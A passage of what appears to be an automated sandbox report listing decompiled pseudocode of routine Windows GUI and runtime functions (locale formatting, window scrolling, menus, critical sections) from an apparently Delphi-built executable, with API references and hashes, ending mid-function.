                                  				_push(0);
                                  				_push(0);
                                  				_t122 = __edx;
                                  				_t124 = __eax;
                                  				_push(_t127);
                                  				_push(0x40c7d6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t127;
                                  				_t92 = 1;
                                  				E004043D8(__edx);
                                  				E0040C2D4(GetThreadLocale(), 0x40c7ec, 0x1009,  &_v12);
                                  				if(E00408EF0(0x40c7ec, 1, _t128) + 0xfffffffd - 3 < 0) {
                                  					while(1) {
                                  						_t41 = E00404698(_t124);
                                  						__eflags = _t92 - _t41;
                                  						if(_t92 > _t41) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                  						asm("bt [0x4a010c], eax");
                                  						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                  							_t45 = E004095BC(_t124 + _t92 - 1, 2, 0x40c7f0);
                                  							__eflags = _t45;
                                  							if(_t45 != 0) {
                                  								_t47 = E004095BC(_t124 + _t92 - 1, 4, 0x40c800);
                                  								__eflags = _t47;
                                  								if(_t47 != 0) {
                                  									_t49 = E004095BC(_t124 + _t92 - 1, 2, 0x40c818);
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                  										__eflags = _t51;
                                  										if(_t51 == 0) {
                                  											L24:
                                  											E004046A0(_t122, 0x40c830);
                                  										} else {
                                  											__eflags = _t51 != 0x20;
                                  											if(_t51 != 0x20) {
                                  												E004045C0();
                                  												E004046A0(_t122, _v24);
                                  											} else {
                                  												goto L24;
                                  											}
                                  										}
                                  									} else {
                                  										E004046A0(_t122, 0x40c824);
                                  										_t92 = _t92 + 1;
                                  									}
                                  								} else {
                                  									E004046A0(_t122, 0x40c810);
                                  									_t92 = _t92 + 3;
                                  								}
                                  							} else {
                                  								E004046A0(_t122, 0x40c7fc);
                                  								_t92 = _t92 + 1;
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						} else {
                                  							_v8 = E0040D718(_t124, _t92);
                                  							E004048F8(_t124, _v8, _t92,  &_v20);
                                  							E004046A0(_t122, _v20);
                                  							_t92 = _t92 + _v8;
                                  						}
                                  					}
                                  				} else {
                                  					_t75 =  *0x4bc748; // 0x9
                                  					_t76 = _t75 - 4;
                                  					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                  						_t77 = 1;
                                  					} else {
                                  						_t77 = 0;
                                  					}
                                  					if(_t77 == 0) {
                                  						E0040442C(_t122, _t124);
                                  					} else {
                                  						while(_t92 <= E00404698(_t124)) {
                                  							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                  							__eflags = _t83;
                                  							if(_t83 != 0) {
                                  								__eflags = _t83 != 0x20;
                                  								if(_t83 != 0x20) {
                                  									E004045C0();
                                  									E004046A0(_t122, _v16);
                                  								}
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						}
                                  					}
                                  				}
                                  				L28:
                                  				_pop(_t111);
                                  				 *[fs:eax] = _t111;
                                  				_push(E0040C7DD);
                                  				return E004043FC( &_v24, 4);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040C7D6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C63B
                                    • Part of subcall function 0040C2D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: 536e37d3c0041148d42fa77e41a5475a8424998882fb45136ddedfdbb558155f
                                  • Instruction ID: 5e2cfa4f1505c3fc26b2c05eee7d4dae8800807708694686a8841c935d880d75
                                  • Opcode Fuzzy Hash: 536e37d3c0041148d42fa77e41a5475a8424998882fb45136ddedfdbb558155f
                                  • Instruction Fuzzy Hash: F341E879710506CBC711ABA988C16BEB296DBC5304B604B3BE541F33C6E73D9D029A2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E0046FF40(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _t46;
                                  				int _t56;
                                  				void* _t68;
                                  				void* _t71;
                                  				void* _t85;
                                  				char _t86;
                                  				intOrPtr _t90;
                                  				intOrPtr _t91;
                                  				intOrPtr _t92;
                                  				intOrPtr _t93;
                                  				intOrPtr _t96;
                                  				intOrPtr _t101;
                                  				void* _t107;
                                  				intOrPtr _t109;
                                  				void* _t112;
                                  
                                  				_t86 = 0;
                                  				_v28 = 0;
                                  				_t109 = __edx;
                                  				_t85 = __eax;
                                  				_push(_t112);
                                  				_push(0x47011e);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t112 + 0xffffffe8;
                                  				if(__edx == 0) {
                                  					L8:
                                  					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
                                  						L12:
                                  						if(_t109 != 0 &&  *((intOrPtr*)(_t109 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
                                  							_t91 =  *0x46d120; // 0x46d16c
                                  							if(E004037A4(_t109, _t91) == 0) {
                                  								_t92 =  *0x4a00a0; // 0x0
                                  								if(E004037A4(_t109, _t92) == 0) {
                                  									_t93 =  *0x4a00a0; // 0x0
                                  									if(E004037A4(_t109, _t93) == 0 && E0046FF10(E00403550(_t109, _t86), "TDBEdit") == 0 && E0046FF10(E00403550(_t109, _t86), "TDBMemo") == 0) {
                                  										_t46 = E0044D894(_t85);
                                  										_t131 = _t46;
                                  										if(_t46 != 0) {
                                  											E0047014C(_t85, _t109, _t131);
                                  											_t56 = E0044D590(_t109);
                                  											SendMessageA(E0044D590(_t85), 0x469, _t56, 0);
                                  										}
                                  										 *((intOrPtr*)(_t85 + 0x20c)) = _t109;
                                  										_t96 =  *0x435174; // 0x4351c0
                                  										if(E004037A4(_t109, _t96) != 0) {
                                  											E00408D78( &_v28);
                                  											E00446D74(_t109, _t85, _v28, _t109);
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						_pop(_t90);
                                  						 *[fs:eax] = _t90;
                                  						_push(0x470125);
                                  						return E004043D8( &_v28);
                                  					}
                                  					if(E0044D894(_t85) != 0) {
                                  						SendMessageA(E0044D590(_t85), 0x469, 0, 0);
                                  					}
                                  					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
                                  					goto L12;
                                  				}
                                  				_t68 = E0044A2C0( *((intOrPtr*)(__eax + 0x30))) - 1;
                                  				if(_t68 >= 0) {
                                  					_v8 = _t68 + 1;
                                  					_t107 = 0;
                                  					do {
                                  						_t71 = E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107);
                                  						_t101 =  *0x46d120; // 0x46d16c
                                  						if(E004037A4(_t71, _t101) != 0 && _t85 != E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107) && _t109 ==  *((intOrPtr*)(E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107) + 0x20c))) {
                                  							_v24 =  *((intOrPtr*)(_t109 + 8));
                                  							_v20 = 0xb;
                                  							_v16 =  *((intOrPtr*)(E0044A284( *((intOrPtr*)(_t85 + 0x30)), _t107) + 8));
                                  							_v12 = 0xb;
                                  							_t86 =  *0x4bb1f4; // 0x469658
                                  							E0040CBBC(_t85, _t86, 1, _t107, _t109, 1,  &_v24);
                                  							E00403DEC();
                                  						}
                                  						_t107 = _t107 + 1;
                                  						_t16 =  &_v8;
                                  						 *_t16 = _v8 - 1;
                                  					} while ( *_t16 != 0);
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: TDBEdit$TDBMemo
                                  • API String ID: 3850602802-2833401046
                                  • Opcode ID: faa74b04694734372a68e8cc7488cc854d553a016e511a999c0618aa98d420bf
                                  • Instruction ID: 954a128f21679f8786b188ed99450de7a380ef1c6ff382640c787c01b6b15da4
                                  • Opcode Fuzzy Hash: faa74b04694734372a68e8cc7488cc854d553a016e511a999c0618aa98d420bf
                                  • Instruction Fuzzy Hash: B941B470B116008BDB10EF2ADC4169A77A8EF45708F5084BBF884EB396D6BEDD05875D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00444EFC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                  				intOrPtr _v16;
                                  				intOrPtr _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t28;
                                  				intOrPtr* _t32;
                                  				intOrPtr _t35;
                                  				intOrPtr _t37;
                                  				struct HWND__* _t38;
                                  				intOrPtr _t39;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t45;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t53;
                                  				long _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t60;
                                  				intOrPtr* _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t70;
                                  				intOrPtr* _t77;
                                  				void* _t79;
                                  				intOrPtr* _t80;
                                  				long long _t87;
                                  
                                  				_t87 = __fp0;
                                  				_t80 = _t79 + 0xfffffff8;
                                  				_t70 = __ecx;
                                  				_t45 = __edx;
                                  				_t77 = __eax;
                                  				 *0x4bcafc = __eax;
                                  				_t24 =  *0x4bcafc; // 0x0
                                  				 *((intOrPtr*)(_t24 + 4)) = 0;
                                  				GetCursorPos(0x4bcb08);
                                  				_t26 =  *0x4bcafc; // 0x0
                                  				_t58 = 0x4bcb08->x; // 0x0
                                  				 *(_t26 + 0xc) = _t58;
                                  				_t59 =  *0x4bcb0c; // 0x0
                                  				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
                                  				 *0x4bcb10 = GetCursor();
                                  				_t28 =  *0x4bcafc; // 0x0
                                  				 *0x4bcb04 = E00444110(_t28);
                                  				 *0x4bcb14 = _t70;
                                  				_t60 =  *0x441810; // 0x44185c
                                  				if(E004037A4(_t77, _t60) == 0) {
                                  					__eflags = _t45;
                                  					if(__eflags == 0) {
                                  						 *0x4bcb18 = 0;
                                  					} else {
                                  						 *0x4bcb18 = 1;
                                  					}
                                  				} else {
                                  					_t65 = _t77;
                                  					_t4 = _t65 + 0x44; // 0x44
                                  					_t41 = _t4;
                                  					_t49 =  *_t41;
                                  					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
                                  						__eflags = 0;
                                  						 *((intOrPtr*)(_t65 + 0x20)) = 0;
                                  						 *((intOrPtr*)(_t65 + 0x24)) = 0;
                                  					} else {
                                  						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
                                  						asm("fild dword [esp]");
                                  						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
                                  						asm("fild dword [esp+0x4]");
                                  						asm("fdivp st1, st0");
                                  						 *((long long*)(_t65 + 0x20)) = __fp0;
                                  						asm("wait");
                                  					}
                                  					_t66 =  *((intOrPtr*)(_t41 + 4));
                                  					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
                                  						__eflags = 0;
                                  						 *((intOrPtr*)(_t77 + 0x28)) = 0;
                                  						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
                                  					} else {
                                  						_t53 = _t77;
                                  						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
                                  						asm("fild dword [esp]");
                                  						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
                                  						asm("fild dword [esp+0x4]");
                                  						asm("fdivp st1, st0");
                                  						 *((long long*)(_t53 + 0x28)) = _t87;
                                  						asm("wait");
                                  					}
                                  					if(_t45 == 0) {
                                  						 *0x4bcb18 = 0;
                                  					} else {
                                  						 *0x4bcb18 = 2;
                                  						 *((intOrPtr*)( *_t77 + 0x30))();
                                  					}
                                  				}
                                  				_t32 =  *0x4bcafc; // 0x0
                                  				 *0x4bcb1c =  *((intOrPtr*)( *_t32 + 8))();
                                  				_t85 =  *0x4bcb1c;
                                  				if( *0x4bcb1c != 0) {
                                  					_t37 =  *0x4bcb0c; // 0x0
                                  					_t38 = GetDesktopWindow();
                                  					_t39 =  *0x4bcb1c; // 0x0
                                  					E0044F0B4(_t39, _t38, _t85, _t37);
                                  				}
                                  				_t35 = E004035DC(1);
                                  				 *0x4bcb24 = _t35;
                                  				if( *0x4bcb18 != 0) {
                                  					_t35 = E00444C2C(0x4bcb08, 1);
                                  				}
                                  				return _t35;
                                  			}

                                  APIs
                                  • GetCursorPos.USER32(004BCB08), ref: 00444F1D
                                  • GetCursor.USER32 ref: 00444F39
                                    • Part of subcall function 00444110: SetCapture.USER32(00000000), ref: 0044411F
                                  • GetDesktopWindow.USER32 ref: 0044502B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Cursor$CaptureDesktopWindow
                                  • String ID: \?D
                                  • API String ID: 669539147-3012075891
                                  • Opcode ID: 775c87cd034484c10bc813759c2023dff438fe685f96178183fad7576f21e4ab
                                  • Instruction ID: ed8a1a99ec6da19db8c07cbc1885fc7771fd527ae141c19ff58d32121d7f3c14
                                  • Opcode Fuzzy Hash: 775c87cd034484c10bc813759c2023dff438fe685f96178183fad7576f21e4ab
                                  • Instruction Fuzzy Hash: 8B41AF756082008FD304DF2EE9C5A19BBE1FB88314B15C67ED4888B3A6DB35EC41CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044D148(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                  				char _t23;
                                  				struct HWND__* _t42;
                                  				void* _t43;
                                  				intOrPtr _t47;
                                  				void* _t54;
                                  				void* _t56;
                                  				void* _t57;
                                  				void* _t58;
                                  				intOrPtr* _t59;
                                  
                                  				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                  				 *_t59 = __edx;
                                  				_t54 = __eax;
                                  				_t42 =  *(__eax + 0x180);
                                  				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                  					_t23 = 0;
                                  				} else {
                                  					_t23 = 1;
                                  				}
                                  				 *((char*)(_t59 + 8)) = _t23;
                                  				if( *((char*)(_t59 + 8)) != 0) {
                                  					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                  				}
                                  				_t56 = E0044A2C0(_t54) - 1;
                                  				if(_t56 < 0) {
                                  					L14:
                                  					return E00449E48();
                                  				} else {
                                  					_t57 = _t56 + 1;
                                  					_t58 = 0;
                                  					do {
                                  						_t43 = E0044A284(_t54, _t58);
                                  						_t47 =  *0x442c24; // 0x442c70
                                  						if(E004037A4(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                  							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                  							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                  						} else {
                                  							if( *((char*)(_t59 + 8)) == 0) {
                                  								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                  							}
                                  						}
                                  						_t58 = _t58 + 1;
                                  						_t57 = _t57 - 1;
                                  					} while (_t57 != 0);
                                  					goto L14;
                                  				}
                                  			}

                                  APIs
                                  • IsWindowVisible.USER32(0045F234), ref: 0044D163
                                  • ScrollWindow.USER32(0045F234,?,?,00000000,00000000), ref: 0044D192
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044D208
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: Window$ScrollVisible
                                  • String ID: p,D
                                  • API String ID: 4127837035-3811598181
                                  • Opcode ID: e4cb3111b9541be118a9da2e6032bf9fa2a48d33a2f6cdb02901db2658669b4e
                                  • Instruction ID: bc6344d9b320de87025502649efedb64f8e29c04e4bd2579db7bcb5991660045
                                  • Opcode Fuzzy Hash: e4cb3111b9541be118a9da2e6032bf9fa2a48d33a2f6cdb02901db2658669b4e
                                  • Instruction Fuzzy Hash: 8C219F71A042006FE711DA69CC80B6BB7E4AF88714F14856EFA488B352D639EC05976A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00428DB4(void* __ecx, void* __edx) {
                                  				void* __ebx;
                                  				void* __esi;
                                  				intOrPtr _t19;
                                  				char _t32;
                                  				intOrPtr _t33;
                                  				intOrPtr _t35;
                                  				void* _t38;
                                  				void* _t39;
                                  				void* _t40;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				intOrPtr _t49;
                                  				void* _t50;
                                  				void* _t51;
                                  
                                  				_t40 = __edx;
                                  				_t39 = __ecx;
                                  				if(__edx != 0) {
                                  					_t51 = _t51 + 0xfffffff0;
                                  					_t19 = E00403984(_t19, _t50);
                                  				}
                                  				_t38 = _t40;
                                  				_t46 = _t19;
                                  				E004035DC(0);
                                  				_t1 = _t46 + 0x38; // 0x38
                                  				L00406C24();
                                  				_t47 = E004282BC(1);
                                  				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
                                  				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
                                  				 *((intOrPtr*)(_t47 + 8)) = 0x429724;
                                  				_t5 = _t46 + 0x38; // 0x38
                                  				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
                                  				_t48 = E004287E8(1);
                                  				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
                                  				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
                                  				 *((intOrPtr*)(_t48 + 8)) = 0x429744;
                                  				_t10 = _t46 + 0x38; // 0x38
                                  				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
                                  				_t49 = E00428AB4(1);
                                  				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
                                  				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
                                  				 *((intOrPtr*)(_t49 + 8)) = 0x429764;
                                  				_t15 = _t46 + 0x38; // 0x38
                                  				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
                                  				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
                                  				_t32 =  *0x428e74; // 0x0
                                  				 *((char*)(_t46 + 8)) = _t32;
                                  				_t33 =  *0x4bc8e8; // 0x1c40b24
                                  				E0041CB94(_t33, _t38, _t39, _t46, _t49);
                                  				_t35 = _t46;
                                  				if(_t38 != 0) {
                                  					E004039DC(_t35);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t46;
                                  			}

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(0042C510,0042C4D8,?,00000001,0042C66E,?,?,?,0042D8E1,?,?,0042D700,?,0000000E,00000000,?), ref: 00428DD4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalInitializeSection
                                  • String ID: pkB$lB$mB
                                  • API String ID: 32694325-82364836
                                  • Opcode ID: 237067b1ff60d7a5bdcf8391008620db356084f6eaf080dae582b76478651ecd
                                  • Instruction ID: dbf69811efc71204ac50340997583ca5633be5a5a4e7ada47fef52909b7a8577
                                  • Opcode Fuzzy Hash: 237067b1ff60d7a5bdcf8391008620db356084f6eaf080dae582b76478651ecd
                                  • Instruction Fuzzy Hash: CF118EB1701A118FC320DF2AE880645BBE8BF94318384863FE459C3B11DB79A919CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0045AECC(intOrPtr* __eax) {
                                  				struct tagMENUITEMINFOA _v128;
                                  				intOrPtr _v132;
                                  				int _t16;
                                  				intOrPtr* _t29;
                                  				struct HMENU__* _t36;
                                  				MENUITEMINFOA* _t37;
                                  
                                  				_t37 =  &_v128;
                                  				_t29 = __eax;
                                  				_t16 =  *0x4bb254; // 0x4bc744
                                  				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                  					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                  					_t37->cbSize = 0x2c;
                                  					_v132 = 0x10;
                                  					_v128.hbmpUnchecked =  &(_v128.cch);
                                  					_v128.dwItemData = 0x50;
                                  					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  					if(_t16 != 0) {
                                  						_t16 = E0045B280(_t29);
                                  						asm("sbb edx, edx");
                                  						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                  							_v128.cbSize = ((E0045B280(_t29) & 0x0000007f) << 0x0000000d) + ((E0045B280(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                  							_v132 = 0x10;
                                  							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  							if(_t16 != 0) {
                                  								return DrawMenuBar( *(_t29 + 0x38));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: P
                                  • API String ID: 3227129158-3110715001
                                  • Opcode ID: 1e0c374efe4165fa0b74e1ea494cb2e074d90bccaa7aa990911972be7f979cef
                                  • Instruction ID: 09410ca087dcb05112c1a174e5d5186d991eaaffd6d5e3d381df6e71b902c4b5
                                  • Opcode Fuzzy Hash: 1e0c374efe4165fa0b74e1ea494cb2e074d90bccaa7aa990911972be7f979cef
                                  • Instruction Fuzzy Hash: 2E11BC716052006FD320DB28CC85B4B7AE4AB84365F14876AF494CB3EAD778D898C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0042F724(void* __ebx, void* __ecx, void* __edx) {
                                  				intOrPtr _t3;
                                  				intOrPtr _t5;
                                  				intOrPtr _t7;
                                  				intOrPtr _t10;
                                  				intOrPtr _t12;
                                  				intOrPtr _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				void* _t20;
                                  				void* _t27;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  
                                  				_t27 = __ecx;
                                  				_push(_t38);
                                  				_push(0x42f7ed);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t38;
                                  				 *0x4bc894 =  *0x4bc894 + 1;
                                  				if( *0x4bc894 == 0) {
                                  					_t3 =  *0x4bc8ec; // 0x1c40ac4
                                  					E0040360C(_t3);
                                  					_t5 =  *0x4a08b4; // 0x0
                                  					E0040360C(_t5);
                                  					_t7 =  *0x4a08b0; // 0x0
                                  					E0040360C(_t7);
                                  					E0042C528(__ebx, _t27);
                                  					_t10 =  *0x4a08b8; // 0x1c40ae8
                                  					E0040360C(_t10);
                                  					_t12 =  *0x4bc8e8; // 0x1c40b24
                                  					E0040360C(_t12);
                                  					_t14 =  *0x4bc8dc; // 0x1c40a4c
                                  					E0040360C(_t14);
                                  					_t16 =  *0x4bc8e0; // 0x1c40a74
                                  					E0040360C(_t16);
                                  					_t18 =  *0x4bc8e4; // 0x1c40a9c
                                  					E0040360C(_t18);
                                  					_t20 =  *0x4bc890; // 0xe4080bba
                                  					DeleteObject(_t20);
                                  					_push("�A&");
                                  					L00406AB4();
                                  					_push(0x4bc8c4);
                                  					L00406AB4();
                                  					_t34 =  *0x41b184; // 0x41b188
                                  					E00404E90(0x4a07d0, 0x12, _t34);
                                  					_t35 =  *0x41b184; // 0x41b188
                                  					E00404E90(0x4a0630, 0x34, _t35);
                                  				}
                                  				_pop(_t33);
                                  				 *[fs:eax] = _t33;
                                  				_push(0x42f7f4);
                                  				return 0;
                                  			}

                                  APIs
                                  • DeleteObject.GDI32(E4080BBA), ref: 0042F79C
                                  • RtlDeleteCriticalSection.KERNEL32(A&,E4080BBA,00000000,0042F7ED), ref: 0042F7A6
                                  • RtlDeleteCriticalSection.KERNEL32(004BC8C4,A&,E4080BBA,00000000,0042F7ED), ref: 0042F7B0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Delete$CriticalSection$Object
                                  • String ID: A&
                                  • API String ID: 378701848-3747508005
                                  • Opcode ID: cdd1848c5c4e2ce5c17adf5f13e3406d688d6ce7d7bb0269ae1306c5030a13a1
                                  • Instruction ID: 5a28f3e71ae9a87e69346d5e5dfc1c2dadb5cbc45c57ec85d5fe565f2e5b87d7
                                  • Opcode Fuzzy Hash: cdd1848c5c4e2ce5c17adf5f13e3406d688d6ce7d7bb0269ae1306c5030a13a1
                                  • Instruction Fuzzy Hash: 9B01DE70340100ABD210BF65ECD391A3BE9E79570A7914A3BF100AB3E2CA7DAD119B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040E3C4() {
                                  				_Unknown_base(*)()* _t1;
                                  				struct HINSTANCE__* _t3;
                                  
                                  				_t1 = GetModuleHandleA("kernel32.dll");
                                  				_t3 = _t1;
                                  				if(_t3 != 0) {
                                  					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                  					 *0x4a0130 = _t1;
                                  				}
